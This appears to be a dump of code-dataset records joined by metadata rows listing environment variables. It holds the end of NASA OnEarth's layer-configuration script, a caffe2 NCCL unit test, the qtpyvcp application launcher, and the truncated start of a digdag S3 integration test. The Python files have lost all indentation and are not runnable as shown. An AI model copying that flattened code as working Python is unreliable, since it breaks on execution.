mapfile.write("\t\t\"wms_style\"\t\t\t\t\"default\"\n")
mapfile.write("\t\t\"wms_style_default_legendurl_width\"\t\"" + str(legendUrl_png_h_width) + "\"\n")
mapfile.write("\t\t\"wms_style_default_legendurl_height\"\t\"" + str(legendUrl_png_h_height) + "\"\n")
mapfile.write("\t\t\"wms_style_default_legendurl_format\"\t\"image/png\"\n")
mapfile.write("\t\t\"wms_style_default_legendurl_href\"\t\"" + legendUrl_png_h_url + "\"\n")
if vectorType:
mapfile.write('\t\t"wms_enable_request"\t\t"GetLegendGraphic"\n')
mapfile.write('\t\t"wfs_getfeature_formatlist"\t\t"geojson,csv"\n')
mapfile.write('\t\t"gml_include_items"\t\t"all"\n')
mapfile.write("\tEND\n")
datacon = "DATA"
if vectorType:
# check if we have json files; if yes, use that extension, otherwise assume shapefiles
jsonsearch = archiveLocation + '/[0-9]*/*.json'
if len(glob.glob(jsonsearch)) == 0:
extension = ''
else:
extension = '.json'
mapfile.write("\tCONNECTIONTYPE OGR\n")
datacon = "CONNECTION"
else:
extension = '.mrf'
if not static and year:
if subdaily:
mapfile.write("\t"+datacon+"\t\"" + archiveLocation + "/" +
yearDirPattern + "/" + fileNamePrefix +
timeDirPattern + subdailyDirPattern +
extension + "\"\n")
else:
mapfile.write("\t"+datacon+"\t\"" + archiveLocation + "/" +
yearDirPattern + "/" + fileNamePrefix +
timeDirPattern + extension + "\"\n")
elif not static and not year:
mapfile.write("\t"+datacon+"\t\"" + archiveLocation + "/" +
fileNamePrefix + timeDirPattern + extension +
"\"\n")
else:
mapfile.write("\t"+datacon+"\t\"" + archiveLocation + "/" +
fileNamePrefix + extension + "\"\n")
mapfile.write("\tPROJECTION\n")
mapfile.write('\t\t\"init={0}"\n'.format(projection.id.lower()))
mapfile.write("\tEND\n")
if vectorType and mapfileLayerContents:
try:
with open(mapfileLayerContents, 'r') as f:
mapfile.write(f.read())
mapfile.write("\n")
except:
log_sig_err(
"Couldn't read mapfile LAYER contents file: " +
mapfileLayerContents, sigevent_url)
mapfile.write("END\n")
# Use config filename or directory for logging the current config outside of loop
if not options.layer_config_filename:
current_conf = configuration_directory
else:
current_conf = configuration_filename
# run scripts
if no_twms == False:
for key, twms_endpoint in twms_endpoints.iteritems():
#twms
if twms_endpoint.cacheConfigBasename:
print "\nRunning commands for endpoint: " + twms_endpoint.path
cmd = depth + '/oe_create_cache_config -cbd ' + twms_endpoint.path + " " + twms_endpoint.path + '/' + twms_endpoint.cacheConfigBasename + '.config'
run_command(cmd, sigevent_url)
cmd = depth + '/oe_create_cache_config -cxd ' + twms_endpoint.path + " " + twms_endpoint.path + '/' + twms_endpoint.cacheConfigBasename + '.xml'
run_command(cmd, sigevent_url)
if no_cache == False:
if twms_endpoint.cacheConfigLocation:
print '\nCopying: ' + twms_endpoint.path + '/' + twms_endpoint.cacheConfigBasename + '.config' + ' -> ' + twms_endpoint.cacheConfigLocation + '/' + twms_endpoint.cacheConfigBasename + '.config'
shutil.copyfile(
twms_endpoint.path + '/' +
twms_endpoint.cacheConfigBasename + '.config',
twms_endpoint.cacheConfigLocation + '/' +
twms_endpoint.cacheConfigBasename + '.config')
print '\nCopying: ' + twms_endpoint.path + '/' + twms_endpoint.cacheConfigBasename + '.xml' + ' -> ' + twms_endpoint.cacheConfigLocation + '/' + twms_endpoint.cacheConfigBasename + '.xml'
shutil.copyfile(
twms_endpoint.path + '/' +
twms_endpoint.cacheConfigBasename + '.xml',
twms_endpoint.cacheConfigLocation + '/' +
twms_endpoint.cacheConfigBasename + '.xml')
if twms_endpoint.getCapabilities:
# Add layer metadata to getCapabilities
layer_xml = ""
for xml_file in sorted(
os.listdir(twms_endpoint.path), key=lambda s: s.lower()):
if xml_file.endswith("_gc.xml") and xml_file != "getCapabilities.xml":
layer_xml = layer_xml + open(twms_endpoint.path + '/' + str(xml_file), 'r').read()
getCapabilities_file = twms_endpoint.path + '/getCapabilities.xml'
getCapabilities_base = open(getCapabilities_file, 'r+')
gc_lines = getCapabilities_base.readlines()
for idx in range(0, len(gc_lines)):
if "\t</Layer>" in gc_lines[idx]:
gc_lines[idx] = layer_xml + gc_lines[idx]
print '\nAdding layers to TWMS GetCapabilities'
getCapabilities_base.seek(0)
getCapabilities_base.truncate()
getCapabilities_base.writelines(gc_lines)
getCapabilities_base.close()
if no_xml == False:
if not os.path.exists(twms_endpoint.getCapabilities):
os.makedirs(twms_endpoint.getCapabilities)
print '\nCopying: ' + twms_endpoint.path + '/getCapabilities.xml' + ' -> ' + twms_endpoint.getCapabilities + '/getCapabilities.xml'
shutil.copyfile(
twms_endpoint.path + '/getCapabilities.xml',
twms_endpoint.getCapabilities + '/getCapabilities.xml')
if twms_endpoint.getTileService:
# Add layer metadata to getTileService
layer_xml = ""
for xml_file in sorted(os.listdir(twms_endpoint.path), key=lambda s: s.lower()):
if xml_file.endswith("_gts.xml") and xml_file != "getTileService.xml":
layer_xml = layer_xml + open(twms_endpoint.path + '/' + str(xml_file), 'r').read()
getTileService_file = twms_endpoint.path + '/getTileService.xml'
getTileService_base = open(getTileService_file, 'r+')
gc_lines = getTileService_base.readlines()
for idx in range(0, len(gc_lines)):
if "</TiledPatterns>" in gc_lines[idx]:
gc_lines[idx] = layer_xml + gc_lines[idx]
print '\nAdding layers to TWMS GetTileService'
getTileService_base.seek(0)
getTileService_base.truncate()
getTileService_base.writelines(gc_lines)
getTileService_base.close()
if no_xml == False:
if not os.path.exists(twms_endpoint.getTileService):
os.makedirs(twms_endpoint.getTileService)
print '\nCopying: ' + twms_endpoint.path + '/getTileService.xml' + ' -> ' + twms_endpoint.getTileService + '/getTileService.xml'
shutil.copyfile(
twms_endpoint.path + '/getTileService.xml',
twms_endpoint.getTileService + '/getTileService.xml')
if no_wmts == False:
for key, wmts_endpoint in wmts_endpoints.iteritems():
#wmts
if wmts_endpoint.cacheConfigBasename:
print "\nRunning commands for endpoint: " + wmts_endpoint.path
cmd = depth + '/oe_create_cache_config -cbd ' + wmts_endpoint.path + " " + wmts_endpoint.path + '/' + wmts_endpoint.cacheConfigBasename + '.config'
try:
run_command(cmd, sigevent_url)
except:
log_sig_err("Error in generating binary cache config using command: " + cmd, sigevent_url)
cmd = depth + '/oe_create_cache_config -cxd ' + wmts_endpoint.path + " " + wmts_endpoint.path + '/' + wmts_endpoint.cacheConfigBasename + '.xml'
try:
run_command(cmd, sigevent_url)
except:
log_sig_err(
"Error in generating XML cache config using command: " +
cmd, sigevent_url)
if no_cache == False:
if wmts_endpoint.cacheConfigLocation:
print '\nCopying: ' + wmts_endpoint.path + '/' + wmts_endpoint.cacheConfigBasename + '.config' + ' -> ' + wmts_endpoint.cacheConfigLocation + '/' + wmts_endpoint.cacheConfigBasename + '.config'
shutil.copyfile(
wmts_endpoint.path + '/' +
wmts_endpoint.cacheConfigBasename + '.config',
wmts_endpoint.cacheConfigLocation + '/' +
wmts_endpoint.cacheConfigBasename + '.config')
print '\nCopying: ' + wmts_endpoint.path + '/' + wmts_endpoint.cacheConfigBasename + '.xml' + ' -> ' + wmts_endpoint.cacheConfigLocation + '/' + wmts_endpoint.cacheConfigBasename + '.xml'
shutil.copyfile(
wmts_endpoint.path + '/' +
wmts_endpoint.cacheConfigBasename + '.xml',
wmts_endpoint.cacheConfigLocation + '/' +
wmts_endpoint.cacheConfigBasename + '.xml')
if wmts_endpoint.getCapabilities:
# Add layer metadata to getCapabilities
layer_xml = ""
for xml_file in sorted(
os.listdir(wmts_endpoint.path), key=lambda s: s.lower()):
if xml_file.endswith(
".xml") and xml_file != "getCapabilities.xml" and (
xml_file.startswith("cache") == False):
layer_xml = layer_xml + open(
wmts_endpoint.path + '/' + str(xml_file), 'r').read()
getCapabilities_file = wmts_endpoint.path + '/getCapabilities.xml'
try:
getCapabilities_base = open(getCapabilities_file, 'r+')
gc_lines = getCapabilities_base.readlines()
for idx in range(0, len(gc_lines)):
if "<Contents>" in gc_lines[idx]:
gc_lines[idx] = gc_lines[idx] + layer_xml
print '\nAdding layers to WMTS GetCapabilities'
if "</Contents>" in gc_lines[
idx] and " </TileMatrixSet>" not in gc_lines[idx -
1]:
gc_lines[
idx] = wmts_endpoint.projection.tilematrixset_xml[
2:] + '\n' + gc_lines[idx]
print "\nAdding TileMatrixSet to WMTS GetCapabilities"
getCapabilities_base.seek(0)
getCapabilities_base.truncate()
getCapabilities_base.writelines(gc_lines)
getCapabilities_base.close()
except:
log_sig_err(
"Couldn't read GetCapabilities file: " +
getCapabilities_file, sigevent_url)
if no_xml == False:
print '\nCopying: ' + getCapabilities_file + ' -> ' + wmts_endpoint.getCapabilities + '/getCapabilities.xml'
shutil.copyfile(
getCapabilities_file,
wmts_endpoint.getCapabilities + '/getCapabilities.xml')
if not os.path.exists(wmts_endpoint.getCapabilities +
'1.0.0/'):
os.makedirs(wmts_endpoint.getCapabilities + '1.0.0')
print '\nCopying: ' + getCapabilities_file + ' -> ' + wmts_endpoint.getCapabilities + '/1.0.0/WMTSCapabilities.xml'
shutil.copyfile(
getCapabilities_file, wmts_endpoint.getCapabilities +
'/1.0.0/WMTSCapabilities.xml')
# Create the consolidated mapfile based on the snippets created previously
if create_mapfile is True:
for key, wms_endpoint in wms_endpoints.iteritems():
if wms_endpoint.mapfileLocation is not None and wms_endpoint.mapfileStagingLocation is not None and wms_endpoint.mapfileConfigLocation is not None and wms_endpoint.mapfileConfigBasename is not None:
# Create a new staging mapfile and add header, layers, and footer
staging_mapfile = os.path.join(
wms_endpoint.mapfileStagingLocation,
wms_endpoint.mapfileLocationBasename)
output_mapfile = os.path.join(
wms_endpoint.mapfileLocation,
wms_endpoint.mapfileLocationBasename + ".map")
with open(staging_mapfile, 'w+') as mapfile:
# Append header to mapfile if there is one
mapfile_config_prefix = os.path.join(
wms_endpoint.mapfileConfigLocation,
wms_endpoint.mapfileConfigBasename)
try:
with open(mapfile_config_prefix + '.header',
'r') as header:
mapfile.write(header.read())
print "\nUsing mapfile header: " + header.name
except IOError:
pass
# Iterate through layer mapfile snippets
layers = [
os.path.join(wms_endpoint.mapfileStagingLocation, sfile)
for sfile in sorted(
os.listdir(wms_endpoint.mapfileStagingLocation),
key=unicode.lower) if sfile.endswith('.map') and
not sfile.startswith(wms_endpoint.mapfileLocationBasename)
]
for layer in layers:
with open(layer, 'r') as f:
mapfile.write('\n')
mapfile.write(f.read())
# Append footer to mapfile if there is one
try:
with open(mapfile_config_prefix + '.footer',
'r') as footer:
mapfile.write('\n')
mapfile.write(footer.read())
print "\nUsing mapfile footer: " + footer.name
except IOError:
mapfile.write('\nEND')
pass
print '\nCopying: Mapfile {0} to {1}'.format(
staging_mapfile, output_mapfile)
shutil.copyfile(staging_mapfile, output_mapfile)
else:
if wms_endpoint.mapfileLocation is None:
log_sig_err(
'Mapfile creation enabled but no <MapfileLocation> present in environment config file.',
sigevent_url)
if wms_endpoint.mapfileStagingLocation is None:
log_sig_err(
'Mapfile creation enabled but no <MapfileStagingLocation> present in environment config file.',
sigevent_url)
if wms_endpoint.mapfileConfigLocation is None:
log_sig_err(
'Mapfile creation enabled but no <MapfileConfigLocation> present in environment config file.',
sigevent_url)
if wms_endpoint.mapfileConfigBasename is None:
log_sig_err(
'Mapfile creation enabled but no "basename" attribute specified for <MapfileConfigLocation>.',
sigevent_url)
print '\n*** Layers have been configured successfully ***'
if no_cache == False:
print '\nThe Apache server must be restarted to reload the cache configurations\n'
if restart == True:
cmd = 'sudo apachectl stop'
try:
run_command(cmd, sigevent_url)
except Exception, e:
log_sig_err(str(e), sigevent_url)
cmd = 'sleep 3'
run_command(cmd, sigevent_url)
cmd = 'sudo apachectl start'
try:
run_command(cmd, sigevent_url)
except Exception, e:
log_sig_err(str(e), sigevent_url)
print '\nThe Apache server was restarted successfully'
completion = "The OnEarth Layer Configurator completed "
if len(warnings) > 0:
message = completion + "with warnings."
print "Warnings:"
for warning in warnings:
print warning
if len(errors) > 0:
message = completion + "with errors."
print "\nErrors:"
for error in errors:
print error
if len(warnings) == 0 and len(errors) == 0:
message = completion + "successully."
print ""
message = message + " " + (
"Cache configurations created.",
"Cache configurations staged.")[no_cache] + " " + (
"Server XML created", "Server XML staged")[no_xml] + "." + " " + (
"Apache not restarted",
"Apache restarted")[restart] + "." + " " + (
"Legends not generated",
"Legends generated")[legend] + "." + " " + (
"Archive links not generated",
"Archive links generated")[links] + ". " + (
"Mapfiles not configured", "Mapfiles configured"
)[create_mapfile] + "." + " Warnings: " + str(
len(warnings)) + ". Errors: " + str(len(errors)) + "."
try:
log_info_mssg(asctime() + " " + message)
sigevent('INFO', asctime() + " " + message, sigevent_url)
except urllib2.URLError:
    pass
log_info_mssg('Exiting oe_configure_layer.')
if len(errors) > 0:
sys.exit(len(errors))
else:
sys.exit(0)
|
[] |
[] |
[
"LCDIR"
] |
[]
|
["LCDIR"]
|
python
| 1 | 0 | |
venv/Lib/site-packages/caffe2/contrib/nccl/nccl_ops_test.py
|
import unittest
import hypothesis.strategies as st
from hypothesis import given, assume
import numpy as np
import time
import os
from caffe2.proto import caffe2_pb2
from caffe2.python import core, workspace, muji, dyndep
import caffe2.python.hypothesis_test_util as hu
np.random.seed(1)
dyndep.InitOpsLibrary('@/caffe2/caffe2/contrib/nccl:nccl_ops')
def gpu_device(i):
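    # Build a DeviceOption pinning an operator to GPU index i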
device_option = caffe2_pb2.DeviceOption()
device_option.device_type = workspace.GpuDeviceType
device_option.device_id = i
return device_option
def benchmark(ws, net, warmups=5, iters=100):
for _ in range(warmups):
ws.run(net)
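    # Time 'iters' executions of the net as a single ExecutionStep and report the per-iteration wall-clock time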
plan = core.Plan("plan")
plan.AddStep(core.ExecutionStep("test-step", net, iters))
before = time.time()
ws.run(plan)
after = time.time()
print("Timing network, time taken per-iteration: {:.6f}ms".format((
after - before) / float(iters) * 1000.0))
return after - before
@unittest.skipIf(not workspace.has_cuda_support, "NCCL only on CUDA GPU")
class NCCLOpsTest(hu.HypothesisTestCase):
@given(n=st.integers(min_value=2, max_value=workspace.NumGpuDevices()),
m=st.integers(min_value=1, max_value=1000),
in_place=st.booleans())
def test_nccl_allreduce(self, n, m, in_place):
xs = [np.random.randn(m).astype(np.float32) for i in range(n)]
inputs = [str("x_{}".format(i)) for i in range(n)]
prefix = "" if in_place else "o"
outputs = [str("{}x_{}".format(prefix, i)) for i in range(n)]
op = core.CreateOperator("NCCLAllreduce", inputs, outputs)
input_device_options = {n: gpu_device(i) for i, n in enumerate(inputs)}
def allreduce(*args):
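            # Reference implementation: every GPU should receive the elementwise sum of all inputs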
assert len(args) == n
output = np.sum(args, axis=0)
return [output for _ in range(n)]
outputs = self.assertReferenceChecks(
hu.gpu_do, op, [xs[i] for i, _ in enumerate(inputs)],
allreduce, input_device_options)
for output in outputs:
np.testing.assert_array_equal(outputs[0], output)
self.assertEqual(outputs[0].tobytes(), output.tobytes())
@given(n=st.integers(min_value=2, max_value=workspace.NumGpuDevices()),
m=st.integers(min_value=1, max_value=1000),
root=st.integers(min_value=0,
max_value=workspace.NumGpuDevices() - 1))
def test_nccl_broadcast(self, n, m, root):
assume(root < n)
xs = [np.random.randn(m).astype(np.float32) for i in range(n)]
inputs = [str("x_{}".format(i)) for i in range(n)]
op = core.CreateOperator("NCCLBroadcast", inputs, inputs, root=root)
input_device_options = {n: gpu_device(i) for i, n in enumerate(inputs)}
def broadcast(*args):
assert len(args) == n
return [args[root] for _ in range(n)]
self.assertReferenceChecks(
hu.gpu_do, op, [xs[i] for i, _ in enumerate(inputs)],
broadcast, input_device_options)
@given(n=st.integers(min_value=2, max_value=workspace.NumGpuDevices()),
m=st.integers(min_value=1, max_value=1000),
# NCCL Reduce seems to deadlock for non-zero roots.
root=st.integers(min_value=0, max_value=0),
in_place=st.booleans())
def test_nccl_reduce(self, n, m, root, in_place):
assume(in_place is False or root == 0)
xs = [np.random.randn(m).astype(np.float32) for i in range(n)]
inputs = [str("x_{}".format(i)) for i in range(n)]
op = core.CreateOperator(
"NCCLReduce", inputs,
inputs[root] if in_place else b"o", root=root)
input_device_options = {n: gpu_device(i) for i, n in enumerate(inputs)}
def reduce(*args):
assert len(args) == n
return [np.sum(args, axis=0)]
self.assertReferenceChecks(
hu.gpu_do, op, [xs[i] for i, _ in enumerate(inputs)],
reduce, input_device_options)
@given(n=st.integers(min_value=2, max_value=workspace.NumGpuDevices()),
m=st.integers(min_value=1, max_value=1000))
def test_nccl_allgather(self, n, m):
xs = [np.random.randn(m).astype(np.float32) for i in range(n)]
inputs = [str("x_{}".format(i)) for i in range(n)]
outputs = [str("o_{}".format(i)) for i in range(n)]
op = core.CreateOperator("NCCLAllGather", inputs, outputs)
input_device_options = {n: gpu_device(i) for i, n in enumerate(inputs)}
def allgather(*args):
assert len(args) == n
return [np.stack(args, axis=0) for _ in range(n)]
outputs = self.assertReferenceChecks(
hu.gpu_do, op, [xs[i] for i, _ in enumerate(inputs)],
allgather, input_device_options)
for output in outputs:
np.testing.assert_array_equal(outputs[0], output)
self.assertEqual(outputs[0].tobytes(), output.tobytes())
@given(n=st.integers(min_value=2, max_value=workspace.NumGpuDevices()),
m=st.integers(min_value=1, max_value=1000))
def test_nccl_reduce_scatter(self, n, m):
xs = [np.random.randn(n, m).astype(np.float32) for i in range(n)]
inputs = [str("x_{}".format(i)) for i in range(n)]
outputs = [str("o_{}".format(i)) for i in range(n)]
op = core.CreateOperator("NCCLReduceScatter", inputs, outputs)
input_device_options = {n: gpu_device(i) for i, n in enumerate(inputs)}
def reduce_scatter(*args):
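            # Reference implementation: sum all inputs, then device i keeps row i of the reduced tensor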
assert len(args) == n
reduced = sum(args)
assert len(reduced.shape) > 1
ref = [reduced[i, :] for i in range(n)]
return ref
self.assertReferenceChecks(
hu.gpu_do, op, [xs[i] for i, _ in enumerate(inputs)],
reduce_scatter, input_device_options)
@given(n=st.integers(min_value=2, max_value=workspace.NumGpuDevices()),
m=st.integers(min_value=100000, max_value=100000),
iters=st.integers(min_value=1, max_value=100),
net_type=st.sampled_from(["dag", "async_dag", "simple"]))
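    # The leading underscore keeps this case from being collected by the unittest runner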
def _test_nccl_sync(self, n, m, iters, net_type):
inputs = [str("x_{}".format(i)) for i in range(n)]
extra_inputs = [str("xe_{}".format(i)) for i in range(n)]
net = core.Net("asdf")
net.Proto().type = net_type
net.Proto().num_workers = n
for i in range(n):
net.ConstantFill([], inputs[i], shape=[m], value=0.0,
device_option=gpu_device(i))
net.ConstantFill([], extra_inputs[i], shape=[m], value=1.0,
device_option=gpu_device(i))
for _ in range(iters):
net.Sum([inputs[i], extra_inputs[i]], [inputs[i]],
device_option=gpu_device(i))
net.NCCLReduce(inputs, [inputs[0]], device_option=gpu_device(0))
self.ws.run(net)
np.testing.assert_array_equal(
self.ws.blobs[inputs[0]].fetch(),
np.full(shape=(m,), fill_value=iters * n, dtype=np.float32))
@unittest.skipIf(not os.environ.get("CAFFE2_BENCHMARK"), "Benchmark")
def test_timings(self):
for n in range(2, workspace.NumGpuDevices()):
for in_place in [False, True]:
                xs = [np.random.randn(int(1e7)).astype(np.float32)
for i in range(n)]
inputs = [str("x_{}".format(i)) for i in range(n)]
prefix = "" if in_place else "o"
outputs = [str("{}x_{}".format(prefix, i)) for i in range(n)]
net = core.Net("test")
net.NCCLAllreduce(inputs, outputs)
net.RunAllOnGPU()
for i in range(n):
self.ws.create_blob(inputs[i]).feed(xs[i], gpu_device(i))
self.ws.run(net)
net_time = benchmark(self.ws, net)
vanilla = core.Net("vanilla")
muji.Allreduce(vanilla, inputs)
vanilla_time = benchmark(self.ws, vanilla)
print("Speedup for NCCL: {:.2f}".format(
vanilla_time / net_time))
|
[] |
[] |
[
"CAFFE2_BENCHMARK"
] |
[]
|
["CAFFE2_BENCHMARK"]
|
python
| 1 | 0 | |
qtpyvcp/app/launcher.py
|
import os
import sys
import time
import importlib
from pkg_resources import iter_entry_points
from qtpy.QtCore import Qt
from qtpy.QtWidgets import QApplication
import qtpyvcp
from qtpyvcp import hal
from qtpyvcp.utilities.logger import getLogger
from qtpyvcp.plugins import registerPluginFromClass, postGuiInitialisePlugins
from qtpyvcp.widgets.dialogs.error_dialog import ErrorDialog, IGNORE_LIST
from qtpyvcp.utilities.info import Info
LOG = getLogger(__name__)
INFO = Info()
# Catch unhandled exceptions and display in dialog
def excepthook(exc_type, exc_msg, exc_tb):
try:
filename = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
lineno = exc_tb.tb_lineno
except AttributeError:
# AttributeError: 'NoneType' object has no attribute 'tb_frame'
filename = 'unknown file'
lineno = -1
if len(IGNORE_LIST) > 0 and (str(exc_type), str(exc_msg), lineno) in IGNORE_LIST:
LOG.debug('Ignoring unhandled exception in %s line %i', filename, lineno,
exc_info=(exc_type, exc_msg, exc_tb))
return
LOG.critical('Unhandled exception in %s line %i', filename, lineno,
exc_info=(exc_type, exc_msg, exc_tb))
# if an exception occurs early on a qApp may not have been created yet,
# so create one so the dialog will be able to run without errors.
if QApplication.instance() is None:
app = QApplication([])
error_dialog = ErrorDialog(exc_info=(exc_type, exc_msg, exc_tb))
error_dialog.exec_()
sys.excepthook = excepthook
def log_time(task, times=[time.time(), time.time()]):
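    # The mutable default argument is intentional: times[0] holds the script start time, times[1] the time of the previous call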
now = time.time()
LOG.debug("yellow<Time:> {:.3f} (green<{:+.3f}>) - {}"
.format(now - times[0], now - times[1], task))
times[1] = now
log_time("in script")
def launch_application(opts, config):
qtpyvcp.OPTIONS.update(opts)
qtpyvcp.CONFIG.update(config)
hal_comp = hal.component('qtpyvcp')
    LOG.debug('Loading data plugins')
loadPlugins(config['data_plugins'])
log_time('done loading data plugins')
LOG.debug('Initializing app')
app = _initialize_object_from_dict(config['application'])
log_time('done initializing app')
LOG.debug('Loading dialogs')
loadDialogs(config['dialogs'])
log_time('done loading dialogs')
LOG.debug('Loading windows')
loadWindows(config['windows'])
log_time('done loading windows')
LOG.debug('Initializing widgets')
app.initialiseWidgets()
log_time('done initializing widgets')
hal_comp.ready()
# load any post GUI hal file
postgui_halfile = INFO.getPostguiHalfile()
if postgui_halfile != "":
if not os.path.exists(postgui_halfile):
raise IOError('The specified POSTGUI_HALFILE does not exist: %s' %
postgui_halfile)
ini_path = INFO.INI_FILE
LOG.info('Loading POSTGUI_HALFILE: %s', postgui_halfile)
res = os.spawnvp(os.P_WAIT, "halcmd", ["halcmd", "-i", ini_path, "-f", postgui_halfile])
if res:
raise SystemExit("Failed to load POSTGUI_HALFILE with error: %s" % res)
# suppress QtQuick warnings
app.setAttribute(Qt.AA_DontCreateNativeWidgetSiblings)
sys.exit(app.exec_())
def load_vcp(opts):
vcp = opts.vcp
if vcp is None:
return
vcp_path = os.path.realpath(os.path.join(os.getenv('OLDPWD', '~'), vcp))
if os.path.isfile(vcp_path):
LOG.debug("Attempting to load VCP from file: {}".format(vcp_path))
directory, filename = os.path.split(vcp_path)
name, ext = os.path.splitext(filename)
if ext.lower() in ['.yaml', '.yml']:
_load_vcp_from_yaml_file(vcp_path, opts)
return
elif ext.lower() == '.ui':
_load_vcp_from_ui_file(vcp_path, opts)
return
if _load_vcp_from_entry_point(vcp, opts):
return
LOG.error("Could not load {}, make sure that the name or "
"file path is correct.".format(vcp_path))
def _load_vcp_from_yaml_file(yaml_file, opts):
LOG.info("Loading VCP from YAML file: yellow<{}>".format(yaml_file))
from qtpyvcp.utilities.config_loader import load_config_files
cfg_files = [opts.config_file or '']
cfg_files.extend(os.getenv('VCP_CONFIG_FILES', '').split(':'))
cfg_files.append(yaml_file)
cfg_files.append(qtpyvcp.DEFAULT_CONFIG_FILE)
config = load_config_files(*cfg_files)
# add the YAML file dir to the path so relative modules can be imported
sys.path.insert(0, os.path.dirname(os.path.dirname(yaml_file)))
launch_application(opts, config)
def _load_vcp_from_ui_file(ui_file, opts):
LOG.info("Loading VCP from UI file: yellow<{}>".format(ui_file))
from qtpyvcp.utilities.config_loader import load_config_files
cfg_files = [opts.config_file or '']
cfg_files.extend(os.getenv('VCP_CONFIG_FILES', '').split(':'))
cfg_files.append(qtpyvcp.DEFAULT_CONFIG_FILE)
config = load_config_files(*cfg_files)
kwargs = config['windows']['mainwindow'].get('kwargs', {})
kwargs.update({'ui_file': ui_file})
config['windows']['mainwindow']['kwargs'] = kwargs
launch_application(opts, config)
def _load_vcp_from_entry_point(vcp_name, opts):
entry_points = {}
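# Collect candidate entry points; later groups overwrite earlier ones on name
# collisions, so entries registered under 'qtpyvcp.vcp' take precedence over
# the example and test groups.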
for entry_point in iter_entry_points(group='qtpyvcp.example_vcp'):
entry_points[entry_point.name] = entry_point
for entry_point in iter_entry_points(group='qtpyvcp.test_vcp'):
entry_points[entry_point.name] = entry_point
for entry_point in iter_entry_points(group='qtpyvcp.vcp'):
entry_points[entry_point.name] = entry_point
try:
vcp = entry_points[vcp_name.lower()].load()
except KeyError:
LOG.exception("Failed to find entry point: {}".format(vcp_name))
except Exception as e:
LOG.debug(e)
LOG.exception("Failed to load entry point: {}".format(vcp_name))
else:
LOG.info("Loading VCP from entry point: {}".format(vcp_name))
vcp.main(opts)
return True
def _get_object_by_referance(object_ref):
modname, sep, attrname = object_ref.partition(':')
try:
return getattr(importlib.import_module(modname), attrname)
except Exception:
LOG.critical("Failed to get object by reference: {}".format(object_ref))
raise
def _initialize_object_from_dict(object_dict, parent=None):
"""Initialize a python object from dict."""
provider = object_dict['provider']
args = object_dict.get('args') or []
kwargs = object_dict.get('kwargs') or {}
obj = _get_object_by_referance(provider)
if parent is not None:
kwargs.update({'parent': parent})
return obj(*args, **kwargs)
def loadPlugins(plugins):
for plugin_id, plugin_dict in list(plugins.items()):
try:
cls = plugin_dict['provider']
except KeyError:
raise ValueError("No provider class specified for %s plugin" % plugin_id)
args = plugin_dict.get('args', [])
kwargs = plugin_dict.get('kwargs', {})
registerPluginFromClass(plugin_id=plugin_id, plugin_cls=cls, args=args, kwargs=kwargs)
def loadWindows(windows):
for window_id, window_dict in list(windows.items()):
window = _initialize_object_from_dict(window_dict)
qtpyvcp.WINDOWS[window_id] = window
if window_id == 'mainwindow':
postGuiInitialisePlugins(window)
# show the window by default
if window_dict.get('show', True):
window.show()
def loadDialogs(dialogs):
for dialogs_id, dialogs_dict in list(dialogs.items()):
inst = _initialize_object_from_dict(dialogs_dict)
qtpyvcp.DIALOGS[dialogs_id] = inst
|
[] |
[] |
[
"OLDPWD",
"VCP_CONFIG_FILES"
] |
[]
|
["OLDPWD", "VCP_CONFIG_FILES"]
|
python
| 2 | 0 | |
digdag-tests/src/test/java/acceptance/S3WaitIT.java
|
package acceptance;
import com.amazonaws.auth.AWSCredentials;
import com.amazonaws.auth.AWSStaticCredentialsProvider;
import com.amazonaws.auth.BasicAWSCredentials;
import com.amazonaws.client.builder.AwsClientBuilder;
import com.amazonaws.services.s3.AmazonS3;
import com.amazonaws.services.s3.AmazonS3ClientBuilder;
import com.amazonaws.services.s3.model.ObjectMetadata;
import com.amazonaws.util.StringInputStream;
import com.fasterxml.jackson.databind.JsonNode;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.google.common.collect.ImmutableMap;
import io.digdag.client.DigdagClient;
import io.digdag.client.api.Id;
import io.digdag.client.api.RestSessionAttempt;
import org.apache.commons.lang3.RandomUtils;
import org.junit.After;
import org.junit.Before;
import org.junit.Rule;
import org.junit.Test;
import org.junit.rules.TemporaryFolder;
import org.littleshoot.proxy.HttpProxyServer;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import utils.TemporaryDigdagServer;
import utils.TestUtils;
import java.nio.file.Files;
import java.nio.file.Path;
import java.time.Duration;
import java.util.Base64;
import java.util.UUID;
import static java.nio.charset.StandardCharsets.UTF_8;
import static org.hamcrest.Matchers.is;
import static org.hamcrest.Matchers.isEmptyOrNullString;
import static org.hamcrest.Matchers.not;
import static org.hamcrest.MatcherAssert.assertThat;
import static utils.TestUtils.addWorkflow;
import static utils.TestUtils.attemptSuccess;
import static utils.TestUtils.createProject;
import static utils.TestUtils.expect;
import static utils.TestUtils.startWorkflow;
public class S3WaitIT
{
private static Logger logger = LoggerFactory.getLogger(S3WaitIT.class);
private static final String TEST_S3_ENDPOINT = System.getenv("TEST_S3_ENDPOINT");
private static final String TEST_S3_ACCESS_KEY_ID = System.getenv().getOrDefault("TEST_S3_ACCESS_KEY_ID", "test");
private static final String TEST_S3_SECRET_ACCESS_KEY = System.getenv().getOrDefault("TEST_S3_SECRET_ACCESS_KEY", "test");
private static final ObjectMapper MAPPER = DigdagClient.objectMapper();
public TemporaryDigdagServer server;
@Rule
public TemporaryFolder folder = new TemporaryFolder();
private Path projectDir;
private DigdagClient client;
private HttpProxyServer proxyServer;
private String bucket;
private AmazonS3 s3;
@Before
public void setUp()
throws Exception
{
assertThat(TEST_S3_ENDPOINT, not(isEmptyOrNullString()));
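// Start a proxy that intermittently fails requests (presumably to exercise
// digdag's retry handling); the http_proxy variable set below routes the
// server's outbound HTTP traffic through it.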
proxyServer = TestUtils.startRequestFailingProxy(10);
server = TemporaryDigdagServer.builder()
.environment(ImmutableMap.of(
"http_proxy", "http://" + proxyServer.getListenAddress().getHostString() + ":" + proxyServer.getListenAddress().getPort())
)
.configuration(
"digdag.secret-encryption-key = " + Base64.getEncoder().encodeToString(RandomUtils.nextBytes(16)))
.build();
server.start();
projectDir = folder.getRoot().toPath().resolve("foobar");
client = DigdagClient.builder()
.host(server.host())
.port(server.port())
.build();
bucket = UUID.randomUUID().toString();
AWSCredentials credentials = new BasicAWSCredentials(TEST_S3_ACCESS_KEY_ID, TEST_S3_SECRET_ACCESS_KEY);
s3 = AmazonS3ClientBuilder.standard()
.withCredentials(new AWSStaticCredentialsProvider(credentials))
.withEndpointConfiguration(new AwsClientBuilder.EndpointConfiguration(TEST_S3_ENDPOINT, null))
.build();
